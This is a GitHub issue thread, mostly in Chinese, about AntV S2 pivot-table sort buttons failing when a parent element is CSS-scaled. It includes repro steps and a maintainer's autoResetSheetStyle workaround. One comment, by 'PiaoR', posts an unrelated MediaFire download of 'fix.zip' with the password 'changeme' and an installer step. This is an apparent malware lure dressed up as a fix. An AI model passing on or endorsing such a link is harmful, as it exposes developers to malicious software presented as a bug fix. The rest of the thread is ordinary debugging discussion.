### ISSUE TITLE
🐛S2父级及以上的节点，添加了transform: scale(1.1)后，透视表分组排序按钮失效；（设置supportCSSTransform后依然无效）

### ISSUE THREAD

**Issue by Karl-Xu** [antvis/S2#2879]
### 🏷 Version 1.55.8
| Package        | Version |
| -------------- | ------- |
| @antv/s2       |  1.55.8  |
| @antv/s2-react |  1.47.0  |
| antd |  4.24.16  |
| react |  18.3.1  |
| react-dom |  18.3.1  |

### Sheet Type
- [x]  PivotSheet
- [ ]  TableSheet
- [ ]  GridAnalysisSheet
- [ ]  StrategySheet
- [ ]  EditableSheet

### 🖋 Description
在S2表格的父级及以上的任意结点，添加transform: scale(1.1)样式后，透视表的分组排序按钮失效；通过调试及源码解读，因是点击位置已经不在S2的原始设定范围内，导致无法正确获取canvas内部点击位置
![image](https://github.com/user-attachments/assets/267f2e91-180c-4370-b5d9-5843b5c51f83)
也曾尝试官网的高清适配方案，但是两种场景并不相同，changSheetSize后仍受控与父级scale css样式影响
**特别备注：原bug提交后给出了修复方案，但该方案尝试无用，因无法reopen issue，故不得已，又开了一个**
![image](https://github.com/user-attachments/assets/62b78a6c-9375-465e-acb5-222cfd4488ea)
原issue链接：https://github.com/antvis/S2/issues/2849

### ⌨️ Code Snapshots
使用官网示例：https://s2-v1.antv.antgroup.com/examples/analysis/sort#group-sort
并修改示例项目中的index.html文件，内容更改为：<div id="container" style="transform: scale(1.1); transform-origin: 0px 0px;" />
![image](https://github.com/user-attachments/assets/154aa0d0-71cd-45c9-bcc4-1717e7df377d)

### 🔗 Reproduce Link
修改后的codeSandbox连接：https://codesandbox.io/s/silly-gould-v447zf?file=/index.html

### 🤔 Steps to Reproduce
放大前：
![image](https://github.com/user-attachments/assets/6631bd07-3331-474d-a6fb-20cb6ba036fe)
放大后：
![image](https://github.com/user-attachments/assets/033d2d57-3006-4b2e-9699-b16586359762)

### 😊 Expected Behavior
希望放大后组内排序按钮功能正常；另，我们尝试使用S2 2.x版本，发现存在这样的问题

### 😅 Current Behavior
父级配置scale放大后，组内排序按钮失效

### 💻 System information
| Environment |     Info  |
| ------- | ------------- |
| System  |   macOS Sonoma 14.5   |
| Browser | chrome: v127.0.6533.89 |

**Comment by Karl-Xu** [comment]
特别备注：原bug提交后给出了修复方案，但该方案尝试无用，因无法reopen issue，故不得已，又开了一个
image
原issue链接：https://github.com/antvis/S2/issues/2849

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lijinke666** [comment]
在官网能复现吗? 开启 `supportCSSTransform` 后, 1.x 和 2.x 一切正常, 你提供的 demo 和官网均未复现.

![Kapture 2024-09-10 at 19 00 13](https://github.com/user-attachments/assets/4af00cd2-a832-466e-a0f6-5b0a1d248b07)

**Comment by Karl-Xu** [comment]
我提供的demo可以复现，点击“笔”列下的“价格”功能正常，因为该点击范围还在原尺寸大小之下；请点击“纸张”列下的“价格”的小三角
![image](https://github.com/user-attachments/assets/94e70a8b-552f-45e8-b675-d6b8d8a22215)

**Comment by Karl-Xu** [comment]
> 在官网能复现吗? 开启 `supportCSSTransform` 后, 1.x 和 2.x 一切正常, 你提供的 demo 和官网均未复现.
> 
> ![Kapture 2024-09-10 at 19 00 13](https://private-user-images.githubusercontent.com/21015895/366012994-4af00cd2-a832-466e-a0f6-5b0a1d248b07.gif?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjcxNDY0NDksIm5iZiI6MTcyNzE0NjE0OSwicGF0aCI6Ii8yMTAxNTg5NS8zNjYwMTI5OTQtNGFmMDBjZDItYTgzMi00NjZlLWEwZjYtNWIwYTFkMjQ4YjA3LmdpZj9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTI0VDAyNDkwOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWRkZjljOTA0MjFjYzExMDI4ZWZhMTI0MGMxY2QwODFkYzEyY2FkNjJhODdmMzRjYjFlNTYxY2ZhZjc3YWU2YTMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.fQp5oqij8crO7HR5O76lGwWJVAqbuCxh4uNV17wSaCY) [ ![Kapture 2024-09-10 at 19 00 13](https://private-user-images.githubusercontent.com/21015895/366012994-4af00cd2-a832-466e-a0f6-5b0a1d248b07.gif?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjcxNDY0NDksIm5iZiI6MTcyNzE0NjE0OSwicGF0aCI6Ii8yMTAxNTg5NS8zNjYwMTI5OTQtNGFmMDBjZDItYTgzMi00NjZlLWEwZjYtNWIwYTFkMjQ4YjA3LmdpZj9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTI0VDAyNDkwOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWRkZjljOTA0MjFjYzExMDI4ZWZhMTI0MGMxY2QwODFkYzEyY2FkNjJhODdmMzRjYjFlNTYxY2ZhZjc3YWU2YTMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.fQp5oqij8crO7HR5O76lGwWJVAqbuCxh4uNV17wSaCY) ](https://private-user-images.githubusercontent.com/21015895/366012994-4af00cd2-a832-466e-a0f6-5b0a1d248b07.gif?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjcxNDY0NDksIm5iZiI6MTcyNzE0NjE0OSwicGF0aCI6Ii8yMTAxNTg5NS8zNjYwMTI5OTQtNGFmMDBjZDItYTgzMi00NjZlLWEwZjYtNWIwYTFkMjQ4YjA3LmdpZj9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTI0VDAyNDkwOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWRkZjljOTA0MjFjYzExMDI4ZWZhMTI0MGMxY2QwODFkYzEyY2FkNjJhODdmMzRjYjFlNTYxY2ZhZjc3YWU2YTMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.fQp5oqij8crO7HR5O76lGwWJVAqbuCxh4uNV17wSaCY) [ ](https://private-user-images.githubusercontent.com/21015895/366012994-4af00cd2-a832-466e-a0f6-5b0a1d248b07.gif?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjcxNDY0NDksIm5iZiI6MTcyNzE0NjE0OSwicGF0aCI6Ii8yMTAxNTg5NS8zNjYwMTI5OTQtNGFmMDBjZDItYTgzMi00NjZlLWEwZjYtNWIwYTFkMjQ4YjA3LmdpZj9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTI0VDAyNDkwOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWRkZjljOTA0MjFjYzExMDI4ZWZhMTI0MGMxY2QwODFkYzEyY2FkNjJhODdmMzRjYjFlNTYxY2ZhZjc3YWU2YTMmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.fQp5oqij8crO7HR5O76lGwWJVAqbuCxh4uNV17wSaCY)

Hello，我提供的demo可以复现，点击“笔”列下的“价格”功能正常，因为该点击范围还在原尺寸大小之下；请点击“纸张”列下的“价格”的小三角icon。那个icon超出了原有表格尺寸大小，所以被判定为不在渲染范围内了

**Comment by Karl-Xu** [comment]
> 在官网能复现吗? 开启 `supportCSSTransform` 后, 1.x 和 2.x 一切正常, 你提供的 demo 和官网均未复现.
> 
> ![Kapture 2024-09-10 at 19 00 13](https://private-user-images.githubusercontent.com/21015895/366012994-4af00cd2-a832-466e-a0f6-5b0a1d248b07.gif?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjcxNDY1NDEsIm5iZiI6MTcyNzE0NjI0MSwicGF0aCI6Ii8yMTAxNTg5NS8zNjYwMTI5OTQtNGFmMDBjZDItYTgzMi00NjZlLWEwZjYtNWIwYTFkMjQ4YjA3LmdpZj9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTI0VDAyNTA0MVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTcwZDdjM2IwNzhkZDAwOTAwZTc3NzQzOTEwOTJiMGNlODBlN2E0MzE5OTRiYTkwNjcwZDYzMWE4NzBmMzI1OTkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.XIMD5TdpYOpEnnsE44VuotHTvghHfyK9pXw6g-WKRYc) [ ![Kapture 2024-09-10 at 19 00 13](https://private-user-images.githubusercontent.com/21015895/366012994-4af00cd2-a832-466e-a0f6-5b0a1d248b07.gif?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjcxNDY1NDEsIm5iZiI6MTcyNzE0NjI0MSwicGF0aCI6Ii8yMTAxNTg5NS8zNjYwMTI5OTQtNGFmMDBjZDItYTgzMi00NjZlLWEwZjYtNWIwYTFkMjQ4YjA3LmdpZj9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTI0VDAyNTA0MVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTcwZDdjM2IwNzhkZDAwOTAwZTc3NzQzOTEwOTJiMGNlODBlN2E0MzE5OTRiYTkwNjcwZDYzMWE4NzBmMzI1OTkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.XIMD5TdpYOpEnnsE44VuotHTvghHfyK9pXw6g-WKRYc) ](https://private-user-images.githubusercontent.com/21015895/366012994-4af00cd2-a832-466e-a0f6-5b0a1d248b07.gif?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjcxNDY1NDEsIm5iZiI6MTcyNzE0NjI0MSwicGF0aCI6Ii8yMTAxNTg5NS8zNjYwMTI5OTQtNGFmMDBjZDItYTgzMi00NjZlLWEwZjYtNWIwYTFkMjQ4YjA3LmdpZj9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTI0VDAyNTA0MVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTcwZDdjM2IwNzhkZDAwOTAwZTc3NzQzOTEwOTJiMGNlODBlN2E0MzE5OTRiYTkwNjcwZDYzMWE4NzBmMzI1OTkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.XIMD5TdpYOpEnnsE44VuotHTvghHfyK9pXw6g-WKRYc) [ ](https://private-user-images.githubusercontent.com/21015895/366012994-4af00cd2-a832-466e-a0f6-5b0a1d248b07.gif?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjcxNDY1NDEsIm5iZiI6MTcyNzE0NjI0MSwicGF0aCI6Ii8yMTAxNTg5NS8zNjYwMTI5OTQtNGFmMDBjZDItYTgzMi00NjZlLWEwZjYtNWIwYTFkMjQ4YjA3LmdpZj9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTI0VDAyNTA0MVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTcwZDdjM2IwNzhkZDAwOTAwZTc3NzQzOTEwOTJiMGNlODBlN2E0MzE5OTRiYTkwNjcwZDYzMWE4NzBmMzI1OTkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.XIMD5TdpYOpEnnsE44VuotHTvghHfyK9pXw6g-WKRYc)

Hello，我提供的demo可以复现，点击“笔”列下的“价格”功能正常，因为该点击范围还在原尺寸大小之下；请点击“纸张”列下的“价格”的小三角icon。那个icon超出了原有表格尺寸大小，所以被判定为不在渲染范围内了

**Comment by lijinke666** [comment]
`supportCSSTransform` 是生效了的, 看了下是 [`点击空白处重置交互`](https://s2-v1.antv.antgroup.com/manual/advanced/interaction/basic#%E9%87%8D%E7%BD%AE%E4%BA%A4%E4%BA%92) 导致的, 可以先关闭 `autoResetSheetStyle` 规避

```diff
    const s2Options = {
      width: 600,
      height: 480,
      showDefaultHeaderActionIcon: true, // 默认打开
      supportCSSTransform: true,
+     interaction: {
+       autoResetSheetStyle: false
+     }
    };
```

由于外层有 transform, 导致判断是否是空白处有问题, 感兴趣的话可以来个 PR, 近期有点忙, 可能要晚一点修复

https://github.com/antvis/S2/blob/11bb92c1a3625d8e99bc74c9d3e9f6f768b828ec/packages/s2-core/src/interaction/event-controller.ts#L182-L187

**Comment by Karl-Xu** [comment]
> ```diff
> autoResetSheetStyle: false
> ```

配置autoResetSheetStyle: false后确实可以显示下拉框了，但同时因为autoResetSheetStyle: false，所以点击空白区域无法关闭下拉框了，这个还是等修复吧。
